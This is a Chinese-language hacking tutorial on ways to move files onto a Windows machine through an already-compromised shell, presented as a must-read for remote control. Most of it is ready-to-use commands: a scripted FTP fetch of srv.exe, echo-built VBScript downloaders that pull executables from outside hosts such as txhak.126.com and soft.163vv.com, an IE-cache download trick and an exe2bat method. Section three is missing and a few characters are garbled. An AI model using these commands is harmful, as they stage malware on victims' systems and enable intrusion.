文件上传八大法－远程控制必看

本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.

一，TFTP

格式：tftp -i get file.exe path/file.exe           默认存放在system32下，如果指定就存在指定的地方。

二：ftp下载文件

　　ftp下载文件一般步骤如下：

　　echo open xxx.xxx.xxx.xxx 〉ftp.txt

　　echo user 〉〉ftp.txt

　　echo password 〉〉ftp.txt

　　echo binary 〉〉ftp.txt [可选]

　　echo get srv.exe 〉〉ftp.txt

　　echo bye 〉〉ftp.txt

　　ftp -s:ftp.txt(这一步是关键哟)

　　del ftp.txt

　　这样srv.exe文件拖略谙吕戳恕１Ｖrv.exe已经存在指定位置。

四：写程序下载

　　脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:

　　echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉webdown.vbs

　　echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 〉〉webdown.vbs

　　echo xPost.Send() 〉〉webdown.vbs

　　echo Set sGet = CreateObject("ADODB.Stream") 〉〉webdown.vbs

　　echo sGet.Mode = 3 〉〉webdown.vbs

　　echo sGet.Type = 1 〉〉webdown.vbs

　　echo sGet.Open() 〉〉webdown.vbs

　　echo sGet.Write(xPost.responseBody) 〉〉webdown.vbs

　　echo sGet.SaveToFile "srv.exe",2 〉〉webdown.vbs

　　然后执行cscript webdown.vbs就可以啦。其中，http://txhak.126.com/srv.exe改成你放文件的网站路径，srv.exe可以改成保存文件的路径。 这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。

五：START ITS:HTTP://IP/文件名

　　然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"

　　然后DIR 文件名[1]

　　注意：那串长文件名要用""引起来，因为有空格

　　例子：C:\Documents and Settings\Administrator〉start its:http://xxx.xxx.xxx.xxx/srv.

　　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目录

　　2003-11-22 17:48 12,832 srv[1].exe

　　1 个文件 12,832 字节

　　列出所有文件:

　　1 个文件 12,832 字节

　　0 个目录 6,425,985,024 可用字节

　　C:\Documents and Settings\Administrator〉copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe

　　已复制 1 个文件

六。一句话下载。第4种方法的精简，有时很有用的

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 〉pig.vbs

七。写程序下载

echo iLocal = LCase(WScript.Arguments(1)) 〉c:\down.vbs

echo iRemote = LCase(WScript.Arguments(0)) 〉〉c:\down.vbs

echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉〉c:\down.vbs

echo xPost.Open "GET",iRemote,0 〉〉c:\down.vbs

echo xPost.Send() 〉〉c:\down.vbs

echo Set sGet = CreateObject("ADODB.Stream") 〉〉c:\down.vbs

echo sGet.Mode = 3 〉〉c:\down.vbs

echo sGet.Type = 1 〉〉c:\down.vbs

echo sGet.Open() 〉〉c:\down.vbs

echo sGet.Write(xPost.responseBody) 〉〉c:\down.vbs

echo sGet.SaveToFile iLocal,2 〉〉c:\down.vbs

八.exe2bat命令行下输入，debug还原成文件

用exe2bat这个工具把exe文件转化成bat，然后一行行敲进去，这样工作量非常大，只适合于非常短小的文件。